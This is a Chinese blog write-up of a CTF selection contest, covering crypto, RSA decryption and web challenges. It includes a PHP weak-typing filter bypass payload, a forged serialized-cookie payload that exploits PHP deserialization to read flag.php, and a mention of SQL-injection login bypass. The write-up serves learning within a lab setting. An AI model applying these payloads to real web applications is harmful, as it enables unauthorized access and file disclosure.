​ 前两天参加lsword团队的选拔赛,非常意外的将web题全部AK,也十分荣幸的加入了sword团队可以和大佬们一起交流进步,也在博客记录一下比赛中做出来的几道题目

平台ID:北轨

image-20210724191043113

签到

将签到.exe文件放入IDA中得到flag

社会主义核心价值观

百度搜素社会主义核心价值观解密

Easy_rsa

下载得到cry200无后缀名文件,放入010查看文件头为504B0304,可以判断为zip文件,将文件作为zip文件解压得到key.pem和cipher.bin

img

使用openssl对key.pem进行解密

得到modulus和exponent

在网站上http://factordb.com/将modulus分解为p和q

最后使用rsa解密脚本解密

1
2
3
4
5
6
7
8
9
10
11
12
13
14
import gmpy2

from Crypto.PublicKey import RSA
n = 0x62D3D61C92452630147E89670FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF

e = 65537
a = (2**4244)*699549860111847-1
b = (2**4244)*699549860111847+1
fn = (a - 1) * (b - 1)
d = gmpy2.invert(e,fn)
with open("cipher.bin", "rb") as f:
  datas = int.from_bytes(f.read(),byteorder='big',signed=False)
  out = pow(datas,d,n)
  print(int(out).to_bytes(72,byteorder='big',signed=False).decode("ascii"))

babyweb

万能密码出flag文件路径访问得到flag

img

访问@99687c6233418217/flag.txt

img

Easy_xxe

闪灵cms的nday,封神台原题这里就不写了

Web

Preg_match匹配正则表达式过滤了数字

但是下面的$result又需要$num和$str满足变量都是数字

这里使用(‘>’>’<’)+(‘>’>’<’)基于php弱类型特性得到true值为1

Payload num=1&str=(‘>’>’<’)+(‘>’>’<’)

img

Easy_web

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
if(isset($_GET['source'])){
   $s = new readme();
   $s->source = __FILE__;
   echo $s;
   exit; //构造反序列化字符串使其使用readme函数读取flag.php

//$todos = [];
 if(isset($_COOKIE['todos'])){
   $c = $_COOKIE['todos'];
   $h = substr($c, 0, 32);
   $m = substr($c, 32);
   if(md5($m) === $h) {//前32位的值应该是后32位的MD5
     $todos = unserialize($m);
   }
 }
 if(isset($_POST['text'])){
   $todo = $_POST['text'];
   $todos[] = $todo;
   $m = serialize($todos);
   $h = md5($m);
   setcookie('todos', $h.$m);
   header('Location: '.$_SERVER['REQUEST_URI']);
   exit;
 }

根据核心处代码,使用bp在cookie处构造payload

e2d4f7dcc43ee1db7f69e76303d0105ca:1:{i:0%3bO:6:”readme”:1:{s:6:”source”%3bs:8:”flag.php”%3b}}

(PS:因为cookie是通过url编码储存的所以需要将构造出来的payload进行url编码)